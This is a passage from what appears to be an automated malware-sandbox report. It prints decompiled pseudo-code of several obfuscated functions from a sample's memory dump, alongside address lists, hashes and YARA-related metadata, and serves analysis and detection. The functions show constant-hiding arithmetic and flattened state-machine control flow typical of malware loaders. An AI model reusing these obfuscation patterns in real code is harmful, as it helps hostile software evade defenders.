				_v48 = _v48 * 3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x0013dfa3;
				_v24 = 0x2d4a;
				_v24 = _v24 << 9;
				_v24 = _v24 + 0x17ff;
				_v24 = _v24 ^ 0x005aa30d;
				do {
					while(_t190 != 0x17ec002) {
						if(_t190 == 0x20702549) {
							_push(_v36);
							_t180 = E0022889D(0x22c930, _v76, __eflags);
							_t182 =  *0x22ca2c; // 0x558300
							_t206 =  *0x22ca2c; // 0x558300
							E002129E3(_t206, 0x104, _t180, _v28, _v80, _v12, _t182 + 0x230,  &_v1128, _v72, _v52);
							E00222025(_v20, _t180, _v32, _v64);
							_t214 = _t214 + 0x30;
							_t190 = 0x17ec002;
							continue;
						} else {
							if(_t190 == 0x374ac1da) {
								_push(_t190);
								_push(_t190);
								E0021C6C7(_v60, _v8,  &_v608, _t190, _v44, _v40, _v16);
								_t214 = _t214 + 0x1c;
								_t190 = 0x20702549;
								continue;
							}
						}
						goto L7;
					}
					_push(_t190);
					_push(_v24);
					_push(0);
					_push(_v48);
					_push(0);
					_push(_v68);
					_push( &_v1128);
					_t179 = E0021568E(_v56, 0);
					_t214 = _t214 + 0x1c;
					__eflags = _t179;
					_t209 =  !=  ? 1 : _t209;
					_t190 = 0x3985ca2d;
					L7:
					__eflags = _t190 - 0x3985ca2d;
				} while (__eflags != 0);
				return _t209;
			}

0x002162ac
0x002162b8
0x002162ba
0x002162bf
0x002162c2
0x002162c9
0x002162cd
0x002162d1
0x002162d8
0x002162e4
0x002162e9
0x002162ee
0x002162f5
0x002162fc
0x00216303
0x00216307
0x0021630b
0x00216312
0x00216319
0x0021631d
0x00216321
0x00216328
0x00216333
0x00216336
0x00216339
0x00216340
0x00216347
0x0021634e
0x00216355
0x0021635c
0x00216363
0x0021636a
0x00216371
0x00216378
0x0021637f
0x00216386
0x00216394
0x00216397
0x0021639e
0x002163a5
0x002163ac
0x002163b3
0x002163ba
0x002163be
0x002163c5
0x002163cc
0x002163d3
0x002163dd
0x002163e0
0x002163e3
0x002163ea
0x002163f1
0x002163f5
0x002163f9
0x00216400
0x00216407
0x00216412
0x00216419
0x0021641c
0x00216423
0x0021642a
0x00216431
0x00216435
0x0021643c
0x00216448
0x0021644f
0x00216456
0x0021645d
0x00216464
0x0021646b
0x00216472
0x00216479
0x0021647d
0x00216484
0x0021648f
0x00216492
0x00216496
0x0021649d
0x002164a4
0x002164a8
0x002164af
0x002164b6
0x002164b6
0x002164c4
0x002164f7
0x00216502
0x0021651c
0x00216530
0x0021653c
0x0021654c
0x00216551
0x00216554
0x00000000
0x002164c6
0x002164cc
0x002164d2
0x002164d3
0x002164eb
0x002164f0
0x002164f3
0x00000000
0x002164f3
0x002164cc
0x00000000
0x002164c4
0x0021655e
0x0021655f
0x0021656a
0x0021656c
0x0021656f
0x00216571
0x00216577
0x00216578
0x0021657f
0x00216583
0x00216585
0x00216588
0x0021658d
0x0021658d
0x0021658d
0x002165a1

Strings

I%p , xrefs: 00216443

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: I%p
API String ID: 0-3985577374
Opcode ID: 7481e228344deea9428893874bc067002619b98a873087a9b12232f6e690ec57
Instruction ID: c1beffd3badd59a69725f0f98d8dd1d8f1990478ae3e979731ee56a6e43fd5ad
Opcode Fuzzy Hash: 7481e228344deea9428893874bc067002619b98a873087a9b12232f6e690ec57
Instruction Fuzzy Hash: 308126B1D0021DABDF18CFE5D94A9DEBBB1FB54318F208159E112B62A0D7B90A49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00220D33, Relevance: 1.4, Strings: 1, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00220D33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t128;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				void* _t173;
				signed int _t174;

				_push(_a12);
				_t173 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t128);
				_v8 = 0x6813;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xf4e07894;
				_v8 = _v8 | 0x641e1778;
				_v8 = _v8 ^ 0xf4fe1535;
				_v16 = 0x7d9d;
				_t155 = 0x16;
				_v16 = _v16 * 0x4d;
				_v16 = _v16 ^ 0x0025b62f;
				_v32 = 0xbd8b;
				_v32 = _v32 ^ 0xdfb27dce;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x0a2b09ce;
				_v28 = 0xad22;
				_t156 = 0x34;
				_v28 = _v28 * 0x47;
				_v28 = _v28 + 0x4161;
				_v28 = _v28 ^ 0x00307d44;
				_v36 = 0xa165;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x00006be3;
				_v12 = 0xca43;
				_v12 = _v12 << 7;
				_v12 = _v12 + 0x4480;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x00004998;
				_v44 = 0xc326;
				_v44 = _v44 / _t156;
				_v44 = _v44 ^ 0x000051cc;
				_v40 = 0xa768;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00002cdd;
				_v24 = 0x8f0;
				_v24 = _v24 << 2;
				_v24 = _v24 + 0xffff08f5;
				_v24 = _v24 | 0x28f06395;
				_v24 = _v24 ^ 0xffff76ac;
				_v20 = 0x26e;
				_v20 = _v20 + 0xffffc9ca;
				_v20 = _v20 + 0x3d88;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x00008c1f;
				_v48 = E00228C8F(_t156);
				_v8 = 0xba8c;
				_v8 = _v8 + 0xffff546f;
				_v8 = _v8 | 0xb28855c5;
				_v8 = _v8 ^ 0xa47da239;
				_v8 = _v8 ^ 0x16f5fdc2;
				_v16 = 0x4025;
				_t157 = 0xb;
				_v16 = _v16 / _t157;
				_v16 = _v16 + 0xffffba03;
				_t158 = 0x3b;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x0456c691;
				_t174 = E002178A5(_t158, _t158, _v16, _t158, _v8);
				E00217787(_v44, _t174, _v40,  &_v48, _v24, _v20, _t173);
				 *((short*)(_t173 + _t174 * 2)) = 0;
				return 0;
			}

0x00220d3b
0x00220d3e
0x00220d40
0x00220d43
0x00220d47
0x00220d48
0x00220d4d
0x00220d57
0x00220d5d
0x00220d64
0x00220d6b
0x00220d72
0x00220d7f
0x00220d82
0x00220d85
0x00220d8c
0x00220d93
0x00220da1
0x00220da4
0x00220dab
0x00220db6
0x00220db7
0x00220dba
0x00220dc1
0x00220dc8
0x00220dcf
0x00220dd3
0x00220dda
0x00220de1
0x00220de5
0x00220dec
0x00220df0
0x00220df7
0x00220e05
0x00220e08
0x00220e0f
0x00220e1b
0x00220e1e
0x00220e25
0x00220e2c
0x00220e30
0x00220e37
0x00220e3e
0x00220e45
0x00220e4c
0x00220e53
0x00220e5e
0x00220e61
0x00220e73
0x00220e78
0x00220e7f
0x00220e86
0x00220e8d
0x00220e94
0x00220e9b
0x00220ea7
0x00220eaa
0x00220eaf
0x00220ebb
0x00220ebe
0x00220ec1
0x00220ee5
0x00220ef8
0x00220f02
0x00220f0b

Strings

D}0, xrefs: 00220DC1

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: D}0
API String ID: 0-882559769
Opcode ID: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
Instruction ID: 881cbb372ec5b0c09c4d9f5f3bd0290c07da18dec3b417ee74155c8054ecf3e0
Opcode Fuzzy Hash: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
Instruction Fuzzy Hash: CF51F3B2D0120AEBDF09CFA5C94A8EEBBB2FB44304F208199E111B6250D7B95B55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0022340A, Relevance: 1.4, Strings: 1, Instructions: 118
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0022340A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t88;
				void* _t94;
				void* _t100;
				void* _t102;
				intOrPtr _t117;
				signed int _t118;
				signed int* _t121;

				_t116 = _a8;
				_t100 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t88);
				_v88 = 0x94797;
				_t117 = 0;
				_v84 = 0xfccb1;
				_t121 =  &(( &_v124)[4]);
				_v80 = 0;
				_v120 = 0xe518;
				_t102 = 0x2e39b5d1;
				_v120 = _v120 >> 0xf;
				_v120 = _v120 | 0x8d2dde7f;
				_v120 = _v120 ^ 0x46a7e325;
				_v120 = _v120 ^ 0xcb8a2201;
				_v124 = 0x16d5;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 | 0x69fc1cf8;
				_t118 = 0x78;
				_v124 = _v124 * 0x21;
				_v124 = _v124 ^ 0xa97fd862;
				_v104 = 0xc3ad;
				_v104 = _v104 * 0x54;
				_v104 = _v104 ^ 0x00400d02;
				_v112 = 0x42c5;
				_v112 = _v112 ^ 0xf5e3cf1a;
				_v112 = _v112 ^ 0xb2e8281c;
				_v112 = _v112 | 0x1ecbfa7f;
				_v112 = _v112 ^ 0x5fcbcd35;
				_v96 = 0xbfa3;
				_v96 = _v96 ^ 0x0400a118;
				_v96 = _v96 ^ 0x04005591;
				_v116 = 0x719c;
				_v116 = _v116 / _t118;
				_v116 = _v116 << 3;
				_v116 = _v116 + 0xbb41;
				_v116 = _v116 ^ 0x0000fc42;
				_v100 = 0x8c7a;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0004412d;
				_v92 = 0xd0f9;
				_v92 = _v92 + 0xffffb579;
				_v92 = _v92 ^ 0x0000a3c3;
				_v108 = 0x6440;
				_v108 = _v108 ^ 0x55818320;
				_v108 = _v108 << 0xf;
				_v108 = _v108 + 0x2c19;
				_v108 = _v108 ^ 0xf3b003dd;
				do {
					while(_t102 != 0x4681a3b) {
						if(_t102 == 0xbf6d415) {
							__eflags = E0021B055(_v92, _v108, __eflags,  &_v76, _t116 + 4);
							_t117 =  !=  ? 1 : _t117;
						} else {
							if(_t102 == 0x17b92136) {
								E002250F2( &_v76, _v120, _v124, _v104, _t100);
								_t121 =  &(_t121[3]);
								_t102 = 0x4681a3b;
								continue;
							} else {
								if(_t102 != 0x2e39b5d1) {
									goto L10;
								} else {
									_t102 = 0x17b92136;
									continue;
								}
							}
						}
						L13:
						return _t117;
					}
					_t94 = E00228F11( &_v76, _v112, _v96, _t116, _v116, _v100);
					_t121 =  &(_t121[4]);
					__eflags = _t94;
					if(__eflags == 0) {
						_t102 = 0x114ebae0;
						goto L10;
					} else {
						_t102 = 0xbf6d415;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t102 - 0x114ebae0;
				} while (__eflags != 0);
				goto L13;
			}

0x00223411
0x00223418
0x0022341a
0x0022341b
0x00223422
0x00223423
0x00223424
0x00223429
0x00223431
0x00223433
0x0022343b
0x0022343e
0x00223444
0x0022344c
0x00223451
0x00223456
0x0022345e
0x00223466
0x0022346e
0x00223476
0x0022347b
0x0022348a
0x0022348b
0x0022348f
0x00223497
0x002234a4
0x002234a8
0x002234b0
0x002234b8
0x002234c0
0x002234c8
0x002234d0
0x002234d8
0x002234e0
0x002234e8
0x002234f0
0x00223503
0x00223507
0x0022350c
0x00223514
0x0022351c
0x00223524
0x00223529
0x00223531
0x00223539
0x00223541
0x00223549
0x00223551
0x00223559
0x0022355e
0x00223566
0x0022356e
0x0022356e
0x00223578
0x00223600
0x00223602
0x0022357a
0x00223580
0x002235a2
0x002235a7
0x002235aa
0x00000000
0x00223582
0x00223588
0x00000000
0x0022358a
0x0022358a
0x00000000
0x0022358a
0x00223588
0x00223580
0x00223606
0x0022360e
0x0022360e
0x002235c6
0x002235cb
0x002235ce
0x002235d0
0x002235d6
0x00000000
0x002235d2
0x002235d2
0x00000000
0x002235d2
0x00000000
0x002235db
0x002235db
0x002235db
0x00000000

Strings

@d, xrefs: 00223549

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @d
API String ID: 0-4219467963
Opcode ID: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
Instruction ID: d7fdd38a9ff98e764caf601fda95ee138a4b7f5bc9a71ee8a74649a538659672
Opcode Fuzzy Hash: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
Instruction Fuzzy Hash: 645187711083069BD318CF20D84A82FFBF1BBD8748F404A1DF59A92160D7B9CA698F87

Uniqueness

Uniqueness Score: -1.00%

Function 00223FE7, Relevance: 1.4, Strings: 1, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00223FE7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t80;
				signed int _t94;
				signed int _t95;
				void* _t98;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;

				_push(_a8);
				_t114 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t80);
				_v96 = 0xd1bf;
				_t118 = _t117 + 0x10;
				_t115 = 0;
				_t98 = 0x349149b3;
				_t94 = 0x64;
				_v96 = _v96 / _t94;
				_v96 = _v96 ^ 0x00007874;
				_v104 = 0x2a01;
				_v104 = _v104 + 0x4d1a;
				_v104 = _v104 + 0xb0bd;
				_v104 = _v104 ^ 0x00017b91;
				_v108 = 0x44db;
				_v108 = _v108 + 0xffff0b38;
				_t95 = 0x1c;
				_v108 = _v108 * 7;
				_v108 = _v108 ^ 0xfffb0952;
				_v112 = 0x5707;
				_v112 = _v112 + 0x69dd;
				_v112 = _v112 + 0xef17;
				_v112 = _v112 | 0x7086095e;
				_v112 = _v112 ^ 0x7087ed58;
				_v92 = 0x8129;
				_v92 = _v92 >> 3;
				_v92 = _v92 ^ 0x00001eae;
				_v80 = 0x8f03;
				_v80 = _v80 ^ 0x5fd75a11;
				_v80 = _v80 ^ 0x5fd7f025;
				_v84 = 0x94fc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 ^ 0x00001c7c;
				_v100 = 0xd584;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 / _t95;
				_v100 = _v100 ^ 0x00001ad3;
				_v88 = 0x35b5;
				_v88 = _v88 * 0x43;
				_v88 = _v88 ^ 0x000e607f;
				do {
					while(_t98 != 0x2d9dd110) {
						if(_t98 == 0x2e4dc862) {
							__eflags = E00228F11( &_v76, _v80, _v84, _t114 + 8, _v100, _v88);
							_t115 =  !=  ? 1 : _t115;
						} else {
							if(_t98 == 0x32f61d6a) {
								E002250F2( &_v76, _v96, _v104, _v108, _a8);
								_t118 = _t118 + 0xc;
								_t98 = 0x2d9dd110;
								continue;
							} else {
								if(_t98 != 0x349149b3) {
									goto L10;
								} else {
									_t98 = 0x32f61d6a;
									continue;
								}
							}
						}
						L13:
						return _t115;
					}
					__eflags = E0021B055(_v112, _v92, __eflags,  &_v76, _t114);
					if(__eflags == 0) {
						_t98 = 0x5080212;
						goto L10;
					} else {
						_t98 = 0x2e4dc862;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t98 - 0x5080212;
				} while (__eflags != 0);
				goto L13;
			}

0x00223fee
0x00223ff5
0x00223ff7
0x00223ffe
0x00223fff
0x00224000
0x00224005
0x0022400d
0x00224016
0x00224018
0x00224024
0x00224029
0x0022402f
0x00224037
0x0022403f
0x00224047
0x0022404f
0x00224057
0x0022405f
0x0022406c
0x0022406d
0x00224071
0x00224079
0x00224081
0x00224089
0x00224091
0x00224099
0x002240a1
0x002240a9
0x002240ae
0x002240b6
0x002240be
0x002240c6
0x002240ce
0x002240d6
0x002240db
0x002240e3
0x002240eb
0x002240fb
0x002240ff
0x00224107
0x00224114
0x00224118
0x00224120
0x00224120
0x0022412a
0x002241b1
0x002241b3
0x0022412c
0x0022412e
0x00224153
0x00224158
0x0022415b
0x00000000
0x00224130
0x00224136
0x00000000
0x00224138
0x00224138
0x00000000
0x00224138
0x00224136
0x0022412e
0x002241b7
0x002241bf
0x002241bf
0x00224177
0x00224179
0x0022417f
0x00000000
0x0022417b
0x0022417b
0x00000000
0x0022417b
0x00000000
0x00224184
0x00224184
0x00224184
0x00000000

Strings

tx, xrefs: 0022402F

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: tx
API String ID: 0-1414813443
Opcode ID: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
Instruction ID: 31e401794fa9d942cd0211c86871622527d2f2ac6c3251152b984ba5241e4a1e
Opcode Fuzzy Hash: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
Instruction Fuzzy Hash: 8A41AB71508342ABE718DE20D88582FBBE1FBD8708F104A1DF5C996260D7B5CA69CF83

Uniqueness

Uniqueness Score: -1.00%

Function 002160B9, Relevance: 1.4, Strings: 1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E002160B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				void* _t104;
				void* _t109;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t128;

				_push(_a20);
				_t109 = __ecx;
				_t111 = _a16;
				_push(_a16);
				_push(_a12);
				_v44 = 0x104;
				_push(0x104);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(0x104);
				_v8 = 0xaf29;
				_v8 = _v8 >> 0xe;
				_t128 = 0;
				_v8 = _v8 >> 4;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0000662d;
				_v20 = 0xac55;
				_v20 = _v20 | 0x2323cee5;
				_t124 = 0x4c;
				_v20 = _v20 / _t124;
				_v20 = _v20 ^ 0x007629b6;
				_v16 = 0xabf2;
				_v16 = _v16 | 0x220f7c85;
				_v16 = _v16 + 0xffff7509;
				_v16 = _v16 ^ 0x220f51b4;
				_v40 = 0x3232;
				_t125 = 0x1f;
				_v40 = _v40 / _t125;
				_v40 = _v40 ^ 0x00004228;
				_v36 = 0x2ec1;
				_v36 = _v36 | 0xae4e7a63;
				_v36 = _v36 ^ 0xae4e526e;
				_v12 = 0xa12f;
				_v12 = _v12 << 0xe;
				_v12 = _v12 << 0xb;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x00007580;
				_v32 = 0xadd8;
				_v32 = _v32 | 0x6e6f3325;
				_v32 = _v32 ^ 0x5adaef9e;
				_v32 = _v32 ^ 0x34b54fa4;
				_v28 = 0xb293;
				_t126 = 0x3b;
				_v28 = _v28 * 0x2d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xfb1ed4cf;
				_v24 = 0x2b1c;
				_v24 = _v24 * 6;
				_v24 = _v24 / _t126;
				_v24 = _v24 ^ 0x00001462;
				_t104 = E00217551(_a16, _v24);
				_t127 = _t104;
				if(_t104 != 0) {
					_t128 = E00217663(_v40, _v36, _t127, _t109,  &_v44, _t111, _v12);
					E00224F7D(_v32, _v28, _t127);
				}
				return _t128;
			}

0x002160c2
0x002160c5
0x002160cc
0x002160cf
0x002160d0
0x002160d3
0x002160d6
0x002160d7
0x002160da
0x002160db
0x002160dc
0x002160e1
0x002160ea
0x002160ee
0x002160f0
0x002160f4
0x002160f8
0x002160ff
0x00216106
0x00216112
0x00216117
0x0021611c
0x00216123
0x0021612a
0x00216131
0x00216138
0x0021613f
0x00216149
0x0021614e
0x00216153
0x0021615a
0x00216161
0x00216168
0x0021616f
0x00216176
0x0021617a
0x0021617e
0x00216182
0x00216189
0x00216190
0x00216197
0x0021619e
0x002161a5
0x002161b0
0x002161b4
0x002161b7
0x002161bb
0x002161c2
0x002161cd
0x002161d5
0x002161d8
0x002161eb
0x002161f0
0x002161f7
0x00216211
0x00216217
0x0021621c
0x00216227

Strings

%3on, xrefs: 00216190

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: %3on
API String ID: 2962429428-3639271662
Opcode ID: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
Instruction ID: f5e5e2364cf4c60ced8e49ebe40cb93aac2145f71940f933d13843e4cd496f39
Opcode Fuzzy Hash: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
Instruction Fuzzy Hash: 7D411871E0120AABDB04DFE5C98A8EEFBB5FB84704F208159E911B7250D3B89B55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0021F536, Relevance: 1.3, Strings: 1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0021F536(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t73;
				signed int _t84;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t73);
				_v28 = _v28 & 0x00000000;
				_v32 = 0x4854b3;
				_v8 = 0xdc0b;
				_t84 = 0x56;
				_v8 = _v8 * 0xf;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x0001e73e;
				_v12 = 0xfbc9;
				_v12 = _v12 + 0xb4de;
				_v12 = _v12 * 0x28;
				_v12 = _v12 ^ 0x0043d2f8;
				_v12 = 0x51f2;
				_v12 = _v12 + 0xffffcc79;
				_v12 = _v12 + 0xffffba87;
				_v12 = _v12 ^ 0xffffb404;
				_v12 = 0x6c9d;
				_v12 = _v12 / _t84;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0000581b;
				_v12 = 0x414e;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 | 0x4fdc2cbe;
				_v12 = _v12 ^ 0x4fdc7af3;
				_v12 = 0xe540;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x1b88e412;
				_v12 = _v12 ^ 0x1bebfc09;
				_v24 = 0x3d7;
				_v24 = _v24 + 0xffffb00b;
				_v24 = _v24 ^ 0xffff901a;
				_v20 = 0xd6b0;
				_v20 = _v20 ^ 0xee2b6cd1;
				_v20 = _v20 ^ 0xee2bf683;
				_v16 = 0x5822;
				_v16 = _v16 + 0xa5f;
				_v16 = _v16 ^ 0x00006b11;
				return E002208F3(_v12, _v24, _v20, _a8, _t84, E0021C506(_t84), _v16);
			}

0x0021f53c
0x0021f53f
0x0021f542
0x0021f543
0x0021f544
0x0021f549
0x0021f550
0x0021f559
0x0021f566
0x0021f567
0x0021f56a
0x0021f56e
0x0021f575
0x0021f57c
0x0021f587
0x0021f58a
0x0021f591
0x0021f598
0x0021f59f
0x0021f5a6
0x0021f5ad
0x0021f5b9
0x0021f5bc
0x0021f5bf
0x0021f5c6
0x0021f5cd
0x0021f5d1
0x0021f5d8
0x0021f5df
0x0021f5ea
0x0021f5ed
0x0021f5f4
0x0021f5fb
0x0021f602
0x0021f609
0x0021f610
0x0021f617
0x0021f61e
0x0021f625
0x0021f62c
0x0021f633
0x0021f65e

Strings

j^ , xrefs: 0021F536

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: j^
API String ID: 0-2773993462
Opcode ID: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
Instruction ID: f4d0c6e83eb547189d79b72449e52756eebf3325477f8402a26288fb91bb7676
Opcode Fuzzy Hash: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
Instruction Fuzzy Hash: B031DDB4C0070AEBDF48DFA4C98A49EBFB5FB00304F608089D511BA2A0D3B94B959F81

Uniqueness

Uniqueness Score: -1.00%

Function 00225D1D, Relevance: .2, Instructions: 183
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00225D1D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				void* _t165;
				intOrPtr* _t183;
				void* _t185;
				void* _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;

				_t183 = _a24;
				_push(_t183);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t165);
				_v96 = 0x1c20a7;
				_t194 = 0;
				_v84 = _v84 & 0;
				_t199 = _t198 + 0x20;
				_v92 = 0x7c153;
				_v88 = 0xb2086;
				_t185 = 0x2476afb9;
				_v8 = 0x4175;
				_v8 = _v8 + 0xffff57ff;
				_v8 = _v8 | 0xfffbf4ff;
				_v8 = _v8 ^ 0xffffd856;
				_v56 = 0x400d;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x01004a82;
				_v52 = 0xfa4b;
				_t195 = 0x3f;
				_v52 = _v52 * 0xf;
				_v52 = _v52 ^ 0x000ed31b;
				_v48 = 0x532b;
				_v48 = _v48 | 0xa8aca4f9;
				_v48 = _v48 ^ 0xa8acfbbc;
				_v44 = 0x6cab;
				_v44 = _v44 * 0xd;
				_v44 = _v44 ^ 0x0005813c;
				_v32 = 0xa076;
				_v32 = _v32 + 0x7ba7;
				_v32 = _v32 * 0x33;
				_v32 = _v32 ^ 0x0038af53;
				_v28 = 0x80ef;
				_v28 = _v28 << 0xb;
				_v28 = _v28 | 0xbfaa7514;
				_v28 = _v28 ^ 0xbfaf1f10;
				_v24 = 0x2421;
				_v24 = _v24 / _t195;
				_t196 = 3;
				_v24 = _v24 / _t196;
				_v24 = _v24 ^ 0x000050e2;
				_v68 = 0xf6e5;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x0000085c;
				_v64 = 0x7950;
				_v64 = _v64 | 0xc26498fa;
				_v64 = _v64 ^ 0xc264e84e;
				_v60 = 0xb7cc;
				_v60 = _v60 + 0xffffacef;
				_v60 = _v60 ^ 0x0000478a;
				_v40 = 0x6379;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 << 5;
				_v40 = _v40 ^ 0x00006e22;
				_v20 = 0xe665;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0xe4ef8652;
				_v20 = _v20 + 0xffffeafe;
				_v20 = _v20 ^ 0xe52339cd;
				_v80 = 0x4d1e;
				_v80 = _v80 + 0xffffc710;
				_v80 = _v80 ^ 0x000046ed;
				_v16 = 0x18c;
				_v16 = _v16 >> 4;
				_t197 = _v80;
				_v16 = _v16 * 0x41;
				_v16 = _v16 ^ 0x73128289;
				_v16 = _v16 ^ 0x7312c7aa;
				_v12 = 0xdd0b;
				_v12 = _v12 + 0xffff65de;
				_v12 = _v12 * 0x3b;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x0f6bc641;
				_v76 = 0xf5b7;
				_v76 = _v76 ^ 0xdca6f1c9;
				_v76 = _v76 ^ 0xdca64fd3;
				_v36 = 0xdf9f;
				_v36 = _v36 + 0x7ffe;
				_v36 = _v36 + 0x4fda;
				_v36 = _v36 ^ 0x00019ee0;
				_v72 = 0x5c39;
